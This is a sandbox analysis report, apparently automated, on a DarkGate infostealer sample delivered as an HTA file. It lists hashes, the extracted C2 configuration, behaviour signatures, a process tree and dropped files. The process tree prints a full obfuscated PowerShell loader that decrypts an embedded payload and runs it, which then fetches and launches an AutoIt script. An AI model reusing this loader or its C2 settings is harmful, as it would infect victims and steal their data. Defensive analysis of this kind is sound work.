Overview

overview

10

Static

static

1

05022024_2...he.hta

windows7-x64

6

05022024_2...he.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • submitted
    05-02-2024 14:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    05022024_2208_chache.hta

  • Size

    73KB

  • MD5

    26daad505b15a76a4ae1be76f9c77488

  • SHA1

    70d2f0a9a4f51316f65ff8b895518c6fb824f4c7

  • SHA256

    4644c5cfe036b53190d6f36a2d9e3067ea05622481092ab05b55e5754e89ba2e

  • SHA512

    96e8cc6ea11bd22d9a3195f87c5d4e241e58a1c6fca2de4db1dab4a08d8cd4d4b7a9a51a7b478f16422c030cd675b7ab144015de8c87bcec03bc5c0568c26ffc

  • SSDEEP

    768:kohVndK3EFiaID3u1cP/wTgdok7h/ZdmYu7aZD0fJgPKOjLxphC8U4u4EeUeEgFa:kobndK4IDeshU3gfALti5Oz

Score
10/10
darkgatexiputin1discoveryexecutionstealer

Malware Config

Extracted

Family

darkgate

Botnet

xiputin1

C2

bizabiza.mywire.org

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    8094

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    IXVIPUIJ

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    xiputin1

Extracted

Family

darkgate

Version

6.1.7

Botnet

xiputin1

C2

bizabiza.mywire.org

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    8094

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    IXVIPUIJ

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    xiputin1

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Darkgate family
    darkgate
  • Detect DarkGate stealer 39 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs

    Using AutoIT for possible automate script.

    execution
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1368
      • \??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        2⤵
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1756
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\05022024_2208_chache.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      1⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3084
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $dosMCx = 'AAAAAAAAAAAAAAAAAAAAAJYy7XorWRa+qK18RLz3MACGVTIKVi/vdrN09kdAQH00Qn4s73pwYVuBD2RlZ1yXsBP2ZxjZgKK/f4r1gG0lS02I0qv+m8d422KPqJ+ltFIsCuPgS/xI2dwtPWMDLkdI20Clkwx5VZyCFeOdH1WIsbv4p1Pe5oFoOX9SyRVx90GHDHAA6DOeyMLE1xh8FCdnRUmpO6pBu7tBB9mA7hnCpklMO7II8c3/daXyugSWq1OjNU3R80IJUqfS8ek34F32k6+DOj1fUxbhf9jqZVuLdF42WOptJK4papSQRTb48+4bFSeQTg1k8LZW20JyRbP/sxjr2hR7P5xKHKtRblEXhPPLEi68IdKGwwR9ywLokeSsn23HO4dEG2ZFMmr2TvuFwIbegWNFyKDBw0iBOQqPsXcQ1LL9yl8GaRfBh7tDXOckFCpMVnQ4ZsNnsdroqz3o2qnFXhaqDoMzArWJzbl1F3yOpWkdxlqcl9mKAKjaRmxYH8xSBxHIGo0glG/WiHuMovynOXcXXh9Hh7tvnfR4Z8XcJbOBdduaGZzQgfOJcjQPkbl99gxEPCpR+AFkEc5QhNTRMOOk3POJ7cPD6VkHYYHY6uJAbx8QOEPph0d7YPQ/FKdxkI/tfMm9ah2acL21+COso6YMbzzmykNdOlzml25gmgBX1ZkUKiJRlMYFulkcxFFVnrPvMRifQ1U/9wilMy/LGTvskHqwq23XICS7ROV4UVcFqA6zkopDdFR24NHk1DdpeJRgjBoP/dv/MDa0XJseW+cJYLSL7C4vwoTde/9CiMwx1U0MhCOTXMDjZFPmUUSfRQlLhEOx43ZcB5KqA+H4G7/aBt14HuhutzT6KwXTjp9E0uH4aXQhDtH6mpJmhGuTGJG3Dq8uri8LoJlYdZsDaDoTotWCBSNieE50OA/wpX1q3h0N/trtKG5rCUYFzP/edxhrB7ecD9u265tHsHZNqhnsB/2r9mF+Nwvk080HbCYZzby2UZiApH8R0Gi7';$fZlRFWv = 'dnZWQ2RTQlpYQVZGV3NUUEhKSGhhYmhuS3hJUVVoZVk=';$KgUYArj = New-Object 'System.Security.Cryptography.AesManaged';$KgUYArj.Mode = [System.Security.Cryptography.CipherMode]::ECB;$KgUYArj.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$KgUYArj.BlockSize = 128;$KgUYArj.KeySize = 256;$KgUYArj.Key = [System.Convert]::FromBase64String($fZlRFWv);$iHuNw = [System.Convert]::FromBase64String($dosMCx);$uIavcLcj = $iHuNw[0..15];$KgUYArj.IV = $uIavcLcj;$ZLmvFdAFX = $KgUYArj.CreateDecryptor();$dcDqIMMEQ = $ZLmvFdAFX.TransformFinalBlock($iHuNw, 16, $iHuNw.Length - 16);$KgUYArj.Dispose();$UOwkrU = New-Object System.IO.MemoryStream( , $dcDqIMMEQ );$wzZeKR = New-Object System.IO.MemoryStream;$lUYoKGCdC = New-Object System.IO.Compression.GzipStream $UOwkrU, ([IO.Compression.CompressionMode]::Decompress);$lUYoKGCdC.CopyTo( $wzZeKR );$lUYoKGCdC.Close();$UOwkrU.Close();[byte[]] $SKbxu = $wzZeKR.ToArray();$Yotlw = [System.Text.Encoding]::UTF8.GetString($SKbxu);$Yotlw | powershell -
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2496
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
          3⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4948
          • C:\Users\Admin\AppData\Roaming\Autoit3.exe
            "C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.au3
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Command and Scripting Interpreter: AutoIT
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3992
    • C:\Windows\System32\mousocoreworker.exe
      C:\Windows\System32\mousocoreworker.exe -Embedding
      1⤵
        PID:780
        • \??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of WriteProcessMemory
          PID:2108

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\hdckacf\ceaekah
        Filesize

        1KB

        MD5

        aaa22d2276f7dbc4117dece9c99d1994

        SHA1

        880d2864e00f18fd75adccd222a71fcc01f19330

        SHA256

        1fc8700133632b430753e50cc7a13273f7e70cbabc942c7f1764b43a65895447

        SHA512

        fd192657cb734f6c42648a4ca1156293d6f316b9fc8e070d7970349ee3af58b8a2a97d76ae0889b0b83be8e67d3b79ba9289e31122254755a43f726d9b2e416d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        0aa30cb82b8891d5a57a64ed312a14fb

        SHA1

        fcc5dc9d9d71026af3afb1abd007f75ea102e2ff

        SHA256

        c53094f79b260343ba1efa7d8e62dfa6ab8cf275f947e4eb6bec200228342efb

        SHA512

        e6d9eec3765d3f883e16374d956f31f20bc6147acdffe471540bad8a030b92a7dcfd4bcc10726b9e048a6e3a587fbf468121836c6126b4508a3b786fa721c333

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t32limny.geh.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Autoit3.exe
        Filesize

        872KB

        MD5

        c56b5f0201a3b3de53e561fe76912bfd

        SHA1

        2a4062e10a5de813f5688221dbeb3f3ff33eb417

        SHA256

        237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

        SHA512

        195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

        Download Submit

      • C:\Users\Admin\AppData\Roaming\cFCfcdF
        Filesize

        32B

        MD5

        47eb7d01a3f91d9addcd5536f12e66b1

        SHA1

        0323a14b877b7d756d1e1cf4215b9c4b9a717d10

        SHA256

        56ebf37acbfbc200719bb6e58fa0afcd708c7db7e93dffbb9d6c1cfe61804c24

        SHA512

        d2822a5ba265c8321d38e57d226720def4f7e2c4e440e6c0cea78d2aa2182a1ea08cb7f553a20cf3ebd41a44264eae6ae800b93b7230331b8ab26bdb35478946

        Download Submit

      • C:\Users\Admin\AppData\Roaming\script.au3
        Filesize

        574KB

        MD5

        b40d033be435d8132bb87d4fe626dbd5

        SHA1

        e293fd0360f12fbed69dc800d0d88e48245de41c

        SHA256

        2d5bcc28a41a40b29819b33938f93a9cc6f52133f8bd9af932b29598f5cb69e1

        SHA512

        672c62ceed3896f1440920c3e0974c1d9ff67b2ee20eca2d7477f2e8ca5a9b61e202ddb81c2d2658eb3bdd5b4900939c25899228f2cb395d8311ae7585924c9a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\test.txt
        Filesize

        76B

        MD5

        cc6b1ac02758f11090e9154e6b9dd3db

        SHA1

        784164026c0687d54bec579a957d6c64d0fa991f

        SHA256

        5b23276f3bf0fe8087296a5bc05e10e951c1c9ed75167e322b880eb0294186de

        SHA512

        c06018fa2c8a9b844c2b364ab7a24ec8db5521ea7466edd904c7fde3ecd832bbd055e77453759d34e54853d5347748398e9ae5c147e2751e2881803ea78a0ea2

        Download Submit

      • C:\temp\cc.txt
        Filesize

        4B

        MD5

        d6183c0b507fa0cc80e692b17fe65d9b

        SHA1

        4e1b7529a81f0193aa4db6f2eb7151736e1d3c21

        SHA256

        ac21c6b07de3e558e1d77e85a8a225a7e6c79c59ba464414a5c3dd2f7a89c6c3

        SHA512

        7849b2628183791dfe102f446788314a1c27297912247c07c80978eb195a5aa3f201756faba616723b9d4de10d8296c575aae534a710d348dc33916ec2ee5cbe

        Download Submit

      • C:\temp\fs.txt
        Filesize

        4B

        MD5

        448bbe677e06a4c03bec9f4459f90e4b

        SHA1

        4a007b484438591236f8762d097057d82c0767df

        SHA256

        a987d6b557a754c83f363a26e22175c1d7f108e4fb7cc3ef47d979885c47ac08

        SHA512

        9894a027ea9c2e417a4bc1b845153a494ace823a98f6a713dd1e12e0e53a9c99a7f0781635f212c00d97ea86ae54d628f8acaa2dd5d72cb3cfdb760bb5bdf0b0

        Download Submit

      • memory/1756-149-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-130-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-139-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-137-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-134-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-132-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-143-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-141-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-145-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-147-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-151-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-153-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-155-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/1756-157-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-135-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-142-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-158-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-156-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-154-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-152-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-150-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-148-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-146-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-144-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-140-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-138-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-136-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-133-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-126-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-129-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-128-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-124-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-122-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-114-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-113-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-112-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2108-111-0x0000000000400000-0x0000000000470000-memory.dmp

        Filesize

        448KB

        Download

      • memory/2496-5-0x00000000056A0000-0x00000000056C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2496-0-0x0000000070B00000-0x00000000712B0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2496-21-0x0000000007DD0000-0x000000000844A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2496-2-0x0000000003020000-0x0000000003030000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2496-1-0x00000000050C0000-0x00000000050F6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2496-3-0x0000000003020000-0x0000000003030000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2496-4-0x0000000005730000-0x0000000005D58000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2496-6-0x0000000005F90000-0x0000000005FF6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2496-100-0x0000000070B00000-0x00000000712B0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2496-22-0x0000000006BC0000-0x0000000006BDA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2496-20-0x0000000003020000-0x0000000003030000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2496-7-0x0000000006070000-0x00000000060D6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2496-17-0x0000000006280000-0x00000000065D4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2496-41-0x0000000070B00000-0x00000000712B0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2496-18-0x0000000006680000-0x000000000669E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2496-19-0x00000000066D0000-0x000000000671C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3992-102-0x00000000049E0000-0x00000000059B0000-memory.dmp

        Filesize

        15.8MB

        Download

      • memory/3992-104-0x0000000006080000-0x00000000063CE000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3992-117-0x0000000006080000-0x00000000063CE000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4948-40-0x0000000008B00000-0x00000000090A4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4948-25-0x0000000005060000-0x0000000005070000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4948-69-0x000000006D500000-0x000000006D854000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4948-23-0x0000000070B00000-0x00000000712B0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4948-61-0x00000000085A0000-0x00000000085AA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4948-80-0x0000000008630000-0x0000000008644000-memory.dmp

        Filesize

        80KB

        Download

      • memory/4948-60-0x00000000085C0000-0x00000000085D2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4948-24-0x0000000005060000-0x0000000005070000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4948-81-0x0000000008680000-0x000000000869A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4948-82-0x00000000086C0000-0x00000000086C8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4948-59-0x0000000008580000-0x0000000008591000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4948-39-0x00000000079A0000-0x00000000079C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4948-58-0x0000000008550000-0x000000000855A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4948-79-0x0000000008620000-0x000000000862E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/4948-46-0x000000006D500000-0x000000006D854000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4948-35-0x0000000007690000-0x00000000076D4000-memory.dmp

        Filesize

        272KB

        Download

      • memory/4948-57-0x0000000007DD0000-0x0000000007E73000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4948-96-0x0000000070B00000-0x00000000712B0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4948-56-0x0000000007D70000-0x0000000007D8E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4948-36-0x00000000077D0000-0x0000000007846000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4948-45-0x000000006D3A0000-0x000000006D3EC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4948-38-0x0000000007A80000-0x0000000007B16000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4948-43-0x000000007FA10000-0x000000007FA20000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4948-37-0x0000000005060000-0x0000000005070000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4948-44-0x0000000007D90000-0x0000000007DC2000-memory.dmp

        Filesize

        200KB

        Download